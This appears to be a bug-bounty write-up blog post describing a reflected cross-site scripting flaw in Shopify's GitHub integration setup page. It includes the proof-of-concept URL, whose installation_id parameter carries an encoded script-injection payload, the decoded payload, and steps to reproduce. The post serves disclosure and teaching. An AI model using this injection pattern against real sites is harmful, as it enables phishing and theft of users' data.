Reflected Cross Site Scripting (Awards 3500$ bounty)

Hello, Hunters. You are here because you are struggling or want to advance in your career. Believe me, things take time. Be consistent, continue to learn, and never deceive yourself. If you follow this three mantras, you will undoubtedly achieve success.

For better Career Opportunity Connect with me 1:1 click on 👉🏻(TOPMATE)

Without wasting time let ‘s Start:

The “Shopify Github Integration” tool makes it easier to link a GitHub account to a Shopify store. A vulnerable URL, https://online-store-git.shopifycloud.com, is used during the Github connection process.

Shops Used to Test : devpresent.myshopify.com

Relevant Request IDs: x-request-id: 1cdb077b2d319acccd1237c1142cf89b

Steps To Reproduce:

1. Visit the next URL https://online-store-git.shopifycloud.com/github/setup?installation_id=20913869%7d%7d%7d%29%3b%7d%3balert%281337%29%3bif%281==2%29%7bk=new%20Promise%28function%28%29%7bif%281==2%29%7bv=%7be:%201&setup_action=install
2. After Decoding Above url : “https://online-store-git.shopifycloud.com/github/setup?installation_id=20913869}}});};alert(1337);if(1==2){k=new Promise(function(){if(1==2){v={e: 1&setup_action=install”

Payload used (alert(1337))

3. Enter an owner or staff credentials.

4. The XSS will fire.

Impact

There are several impacts.

• The attacker could use Javascript in order to do phishing attacks.
• Steal data.
• Reflected JS

Thank you for reading !! hope you get to learn some tricks.

Subscribe to the Shuttlertech YouTube channel for more of this type of content and to watch live POCs & To advance your career connect with me 1:1 over topmate .
To encourage me to write more, follow me on medium and click the clap icon.